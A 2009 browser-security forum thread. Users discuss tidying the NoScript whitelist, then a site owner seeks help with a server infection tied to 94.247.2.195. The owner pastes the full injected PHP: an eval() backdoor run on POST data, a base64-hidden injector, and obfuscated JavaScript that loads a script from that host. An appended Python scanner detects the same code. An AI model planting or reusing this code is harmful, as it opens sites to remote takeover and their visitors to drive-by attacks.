I did what you suggested and everything appears to be working OK.
Another question.
NoScript, options, white list.
Would it be a good idea or can't hurt to go through list every so often to remove sites I might never go back and visit?
And reason being just to clean up list a bit.
Or on sites I haven't been to in over say some predetermined time automatically deleted or text turns red.
thanks
94.247.2.195
-
- Posts: 19
- Joined: Wed Apr 15, 2009 2:19 pm
Re: 94.247.2.195
firefox 3.0.8, thunderbird 2.0.0.21, VZ um175 broadband, XP home SP3 2gig
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.9) Gecko/2009040821 Firefox/3.0.9
-
- Ambassador
- Posts: 1586
- Joined: Fri Mar 20, 2009 4:47 am
- Location: Colorado, USA
Re: 94.247.2.195
informactive wrote: Would it be a good idea or can't hurt to go through list every so often to remove sites I might never go back and visit?
It's not necessary but can't hurt. I do that occasionally during my OCD moments. Sometimes I accidentally remove a needed third-party helper site, but it's easily whitelisted again when it's needed.
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.9) Gecko/2009040821 Firefox/3.0.9
-
- Posts: 19
- Joined: Wed Apr 15, 2009 2:19 pm
Re: 94.247.2.195
OK.
It would be nice if NoScript knew when I was going to have an OCD moment and did it for me with a single check box; however, I'll do it in my OCD moments.
firefox 3.0.8, thunderbird 2.0.0.21, VZ um175 broadband, XP home SP3 2gig
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.9) Gecko/2009040821 Firefox/3.0.9
- GµårÐïåñ
- Lieutenant Colonel
- Posts: 3365
- Joined: Fri Mar 20, 2009 5:19 am
- Location: PST - USA
- Contact:
Re: 94.247.2.195
Well it seems like I missed all the action on this one, go figure, but it seems you resolved it and it was already suggested that you got injected. So good luck and now maybe I will get the followup posts.
~.:[ Lï£ê ï§ å Lêmðñ åñÐ Ì Wåñ† M¥ Mðñê¥ ßå¢k ]:.~
________________ .: [ Major Mike's ] :. ________________
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.0.9) Gecko/2009040821 Firefox/3.0.9 AdblockPlus/1.0.2 RequestPolicy/0.5.5 NoScript/1.9.2.1
-
- Posts: 1
- Joined: Tue Apr 28, 2009 10:58 am
Re: 94.247.2.195
I also have my forum infected http://wisebets.org .
I got some help from my hosting company, and they found the code in the following files:
Also I found the following code in almost all my files:
I removed it manually from all I could find, and now the forum is working fine except the posting part. When I try to post on the forum it's getting slow and tries to connect to 94.247.2.195 (before I removed the code it was trying to connect to this IP from any page). But I already searched the code in ALL files (manually) and couldn't find it anymore, even if it's still there.
Any ideas where it may be?
Also, does anyone have a suggestion of how to protect against it so that it won't happen again?
Thanks in advance.
Code: Select all
config.php:
<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCdPWFElM0NzSXB2Y3J6WUZpcHpZRnQlMjBzcjZ2R2MlM0QlMkYlMkY5NCUyRTI0ellGNyUyRW1zbzJJcHYlMkUxOTVuMyUyRk9YUWpJcHZxdWVyeSUyRWpzbXNvJTNFJTNDNnZHJTJGc0lwdmNyaXB0bGklM0UnKS5yZXBsYWNlKC9saXxhUXw2dkd8ellGfE9YUXxtc298RGZ8bjN8SXB2L2csIiIpKTsKIC0tPjwvc2NyaXB0Pg=='));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?><?php
index.php:
<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCdPWFElM0NzSXB2Y3J6WUZpcHpZRnQlMjBzcjZ2R2MlM0QlMkYlMkY5NCUyRTI0ellGNyUyRW1zbzJJcHYlMkUxOTVuMyUyRk9YUWpJcHZxdWVyeSUyRWpzbXNvJTNFJTNDNnZHJTJGc0lwdmNyaXB0bGklM0UnKS5yZXBsYWNlKC9saXxhUXw2dkd8ellGfE9YUXxtc298RGZ8bjN8SXB2L2csIiIpKTsKIC0tPjwvc2NyaXB0Pg=='));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?><?php
postinfo.html:
document.write(unescape('OXQ%3CsIpvcrzYFipzYFt%20sr6vGc%3D%2F%2F94%2E24zYF7%2Emso2Ipv%2E195n3%2FOXQjIpvquery%2Ejsmso%3E%3C6vG%2FsIpvcriptli%3E').replace(/li|aQ|6vG|zYF|OXQ|mso|Df|n3|Ipv/g,""));
_vti_inf.html:
document.write(unescape('OXQ%3CsIpvcrzYFipzYFt%20sr6vGc%3D%2F%2F94%2E24zYF7%2Emso2Ipv%2E195n3%2FOXQjIpvquery%2Ejsmso%3E%3C6vG%2FsIpvcriptli%3E').replace(/li|aQ|6vG|zYF|OXQ|mso|Df|n3|Ipv/g,""));
Code: Select all
<script language=javascript><!-- document.write(unescape('OXQ%3CsIpvcrzYFipzYFt%20sr6vGc%3D%2F%2F94%2E24zYF7%2Emso2Ipv%2E195n3%2FOXQjIpvquery%2Ejsmso%3E%3C6vG%2FsIpvcriptli%3E').replace(/li|aQ|6vG|zYF|OXQ|mso|Df|n3|Ipv/g,"")); -->
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.9) Gecko/2009040821 Firefox/3.0.9
Re: 94.247.2.195
Again. First you have to determine if it is your website or host that is (initially) being exploited.
The .php - who is responsible for that? You or your host? If you, fix it. If your hosting company, have them fix it.
noscript, 94.247.2.195 and malwarebytes
Has my website been hacked?
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.19) Gecko/20110420 SeaMonkey/2.0.14 Pinball NoScript FlashGot AdblockPlus
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.21) Gecko/20090403 SeaMonkey/1.1.16
- GµårÐïåñ
- Lieutenant Colonel
- Posts: 3365
- Joined: Fri Mar 20, 2009 5:19 am
- Location: PST - USA
- Contact:
Re: 94.247.2.195
There might be an import reference to an external file, check all your imports and links in the documents to external JS.
~.:[ Lï£ê ï§ å Lêmðñ åñÐ Ì Wåñ† M¥ Mðñê¥ ßå¢k ]:.~
________________ .: [ Major Mike's ] :. ________________
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.0.9) Gecko/2009040821 Firefox/3.0.9 AdblockPlus/1.0.2 RequestPolicy/0.5.5 NoScript/1.9.2.2
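Added example, not part of the original thread and not any poster's code: a static scanner for the two artifacts quoted in the infected-forum post (the `document.write(unescape(...).replace(...))` snippet and the PHP header that wraps it in `base64_decode` and evaluates request data). It reports the external script URL each snippet resolves to without executing anything. The function names and regexes are assumptions built from the exact strings posted; a variant with different markers would need different patterns.

```python
import base64
import re
from pathlib import Path
from urllib.parse import unquote

# Shape quoted in the post: document.write(unescape('<payload>').replace(/<junk|tokens>/g,""))
JS_DROPPER = re.compile(
    r"""document\.write\(\s*unescape\(\s*'([^']*)'\s*\)\s*\.replace\(\s*/([^/]+)/g\s*,\s*""\s*\)""")
B64_LITERAL = re.compile(r"base64_decode\(\s*'([A-Za-z0-9+/=]+)'\s*\)")
PHP_EVAL_INPUT = re.compile(r"eval\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\b")
SCRIPT_SRC = re.compile(r"<script[^>]*\bsrc\s*=\s*[\"']?([^\s\"'>]+)", re.I)

def decode_dropper(payload, junk):
    """Statically undo unescape() and the junk-token strip; nothing is executed.
    Assumes the junk alternation holds literal tokens, as in the posted sample."""
    strip = "|".join(re.escape(tok) for tok in junk.split("|"))
    return re.sub(strip, "", unquote(payload, encoding="latin-1"))

def scan_text(text):
    """Return (kind, detail) findings for one file's contents."""
    findings = []
    if PHP_EVAL_INPUT.search(text):
        findings.append(("php-eval-of-request-data", ""))
    layers = [text]
    for blob in B64_LITERAL.findall(text):  # snippet hidden inside a PHP string
        try:
            layers.append(base64.b64decode(blob).decode("latin-1"))
        except ValueError:
            continue
    for layer in layers:
        for payload, junk in JS_DROPPER.findall(layer):
            html = decode_dropper(payload, junk)
            src = SCRIPT_SRC.search(html)
            findings.append(("js-dropper", src.group(1) if src else html))
    return findings

def scan_tree(root):
    """Scan every regular file under root; returns {path: findings}."""
    hits = {}
    for path in Path(root).rglob("*"):
        if path.is_file():
            found = scan_text(path.read_text(encoding="latin-1", errors="replace"))
            if found:
                hits[str(path)] = found
    return hits

# Sample input: the snippet exactly as quoted in the post above.
SAMPLE = r"""<script language=javascript><!-- document.write(unescape('OXQ%3CsIpvcrzYFipzYFt%20sr6vGc%3D%2F%2F94%2E24zYF7%2Emso2Ipv%2E195n3%2FOXQjIpvquery%2Ejsmso%3E%3C6vG%2FsIpvcriptli%3E').replace(/li|aQ|6vG|zYF|OXQ|mso|Df|n3|Ipv/g,"")); -->"""
```

Run `scan_tree()` over the whole web root, not only `.php` and `.html` files, since the scan is by content; a file-only scan will not see copies stored elsewhere, such as in the forum's database.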